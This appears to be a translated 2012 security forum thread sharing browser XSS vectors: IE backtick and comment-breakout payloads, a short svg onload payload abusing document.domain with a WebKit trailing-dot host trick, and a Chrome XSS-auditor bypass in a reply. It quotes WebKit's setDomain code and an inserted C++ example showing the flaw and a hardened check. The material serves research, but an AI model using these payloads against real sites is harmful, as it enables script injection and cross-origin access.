Sharing a few XSS vectors I've been working on recently

<img src=`<body/onload=alert(1) />

IE needs a closing tag delimiter in order to recognize a tag. Because src has only an attribute delimiter (the backtick), <img is not treated as a tag, so <body/onload=alert(1) /> gets parsed.

<!-- `<img/src=xx:xx onerror=alert(1)//--!>

In IE, an attribute delimiter inside a comment tag can break through the > terminator, so the preceding comment tag no longer takes effect. (I'm not quite sure of the exact reason myself.)

<svg/onload=domain=id>

22 characters in total; works in WebKit-based browsers.

Here domain=id is equivalent to document.domain=""

Normally this cannot execute.

Combined with a WebKit bug, adding a dot after the host makes it execute, although upstream does not consider this a bug.

Example: http://fiddle.jshell.net./KG7fR/5/show (crossing from jsfiddle over to jsbin)

1#xsser | 2012-05-26 22:18

Love this kind of sharing!!!!

 

2#蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-05-26 22:57

Good stuff.. now I want to ask how to XSS Chrome

 

3#Sogili (.) 长短短 (.) | 2012-05-26 23:05

@蟋蟀哥哥 Do you mean bypassing Chrome's XSS auditor?

 

4#Xhm1n9 | 2012-05-26 23:12

Learned something :)

 

5#蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-05-26 23:46

@Sogili Yes. Google's XSS defenses are quite strong; at the moment pure XSS has no way to bypass them. Only with the help of Flash or other third-party components can it be bypassed

 

6#Sogili (.) 长短短 (.) | 2012-05-26 23:56

@蟋蟀哥哥 <svg><script/xlink:href=data:,alert(1)></script> give this one a try

 

7#冷冷的夜 (1) | 2012-05-27 12:21

@Sogili Thanks for sharing

 

8#p.z | 2012-05-27 12:31

Thanks for sharing!

 

9#gainover | 2012-05-27 13:07

<img src=`<body/onload=alert(1) />

The backtick one has been fixed in IE9. The whole <img src=`<body/onload=alert(1) /> is simply displayed as text.

 

10#CnCxzSec(衰仔) | 2012-05-27 13:54

Thanks for sharing, @Sogili!

 

11#rayh4c | 2012-05-27 21:27

@Sogili http://code.google.com/p/chromium/issues/detail?id=103384 = = this cross-domain one is really bizarre~

 

12#Sogili (.) 长短短 (.) | 2012-05-27 22:54

@rayh4c

void Document::setDomain(const String& newDomain, ExceptionCode& ec)
{
    if (SecurityOrigin::isDomainRelaxationForbiddenForURLScheme(securityOrigin()->protocol())) {
        ec = SECURITY_ERR;
        return;
    }

    // Both NS and IE specify that changing the domain is only allowed when
    // the new domain is a suffix of the old domain.

    // FIXME: We should add logging indicating why a domain was not allowed.

    // If the new domain is the same as the old domain, still call
    // securityOrigin()->setDomainForDOM. This will change the
    // security check behavior. For example, if a page loaded on port 8000
    // assigns its current domain using document.domain, the page will
    // allow other pages loaded on different ports in the same domain that
    // have also assigned to access this page.
    if (equalIgnoringCase(domain(), newDomain)) {
        securityOrigin()->setDomainFromDOM(newDomain);
        if (m_frame)
            m_frame->script()->updateSecurityOrigin();
        return;
    }

    int oldLength = domain().length();
    int newLength = newDomain.length();
    // e.g. newDomain = webkit.org (10) and domain() = www.webkit.org (14)
    if (newLength >= oldLength) {
        ec = SECURITY_ERR;
        return;
    }

    String test = domain();
    // Check that it's a subdomain, not e.g. "ebkit.org"
    if (test[oldLength - newLength - 1] != '.') {
        ec = SECURITY_ERR;
        return;
    }

    // Now test is "webkit.org" from domain()
    // and we check that it's the same thing as newDomain
    test.remove(0, oldLength - newLength);
    if (test != newDomain) {
        ec = SECURITY_ERR;
        return;
    }

    securityOrigin()->setDomainFromDOM(newDomain);
    if (m_frame)
        m_frame->script()->updateSecurityOrigin();
}
Adam Barth found this problem back in 2008 and reported it to WebKit, asking that updateSecurityOrigin be called to check the origin (https://bugs.webkit.org/show_bug.cgi?id=22776).
But ScriptController's updateSecurityOrigin is an empty implementation.
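Added example, not WebKit's code and not part of any post in this thread: a stand-alone C++ port of the suffix check in the setDomain listing quoted in #12, run against the WebKit comment's own www.webkit.org case and against the trailing-dot host from the example URL in the opening post (document.domain="" there), beside a hardened variant (an assumption, not WebKit's actual fix) that refuses the empty target and a trailing-dot host.

```cpp
#include <cstdio>
#include <string>

// Stand-alone port of the suffix logic in the Document::setDomain listing above
// (scheme check dropped, equalIgnoringCase replaced by a plain == for brevity).
// Returns true when the assignment would reach securityOrigin()->setDomainFromDOM.
bool webkitSuffixCheckAllows(const std::string& currentDomain, const std::string& newDomain)
{
    if (currentDomain == newDomain)
        return true;  // same domain: allowed (only the port comparison is relaxed)

    const std::size_t oldLength = currentDomain.size();
    const std::size_t newLength = newDomain.size();
    if (newLength >= oldLength)
        return false;  // new domain must be strictly shorter

    // "Check that it's a subdomain, not e.g. ebkit.org": the character just
    // before the candidate suffix must be a dot. With newDomain == "" this
    // inspects the LAST character of the host, so a trailing dot passes.
    if (currentDomain[oldLength - newLength - 1] != '.')
        return false;

    // Compare the trailing (oldLength - newLength) characters with newDomain.
    return currentDomain.substr(oldLength - newLength) == newDomain;
}

// Hardened variant (assumption, not WebKit's real fix): refuse an empty target
// domain and a host spelled with a trailing dot, so "" can never be accepted
// as a "suffix" of "fiddle.jshell.net.".
bool hardenedCheckAllows(const std::string& currentDomain, const std::string& newDomain)
{
    if (newDomain.empty())
        return false;
    if (!currentDomain.empty() && currentDomain.back() == '.')
        return false;
    return webkitSuffixCheckAllows(currentDomain, newDomain);
}

int main()
{
    // Constructed inputs: the WebKit comment's example and the thread's trailing-dot host.
    const char* cases[][2] = {
        {"www.webkit.org", "webkit.org"}, {"www.webkit.org", "ebkit.org"},
        {"fiddle.jshell.net", ""},        {"fiddle.jshell.net.", ""},
    };
    for (const auto& c : cases)
        std::printf("%-20s -> \"%s\": original %s, hardened %s\n", c[0], c[1],
                    webkitSuffixCheckAllows(c[0], c[1]) ? "allows" : "rejects",
                    hardenedCheckAllows(c[0], c[1]) ? "allows" : "rejects");
    return 0;
}
```

Only the trailing-dot row differs between the two checks: the original accepts "" because the dot check lands on the host's final character, which is why the thread's domain="" assignment is allowed from a host spelled with a trailing dot.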

 

13#凤凰 (phoenix nirvana, reborn from the flames) | 2012-05-29 17:28

Impressive! Learned something

 

14#HuGtion | 2012-05-31 11:02

Thanks for sharing!

 

15#xsser_w (what are you looking at, idiot!) | 2012-06-13 18:00

= =! niubility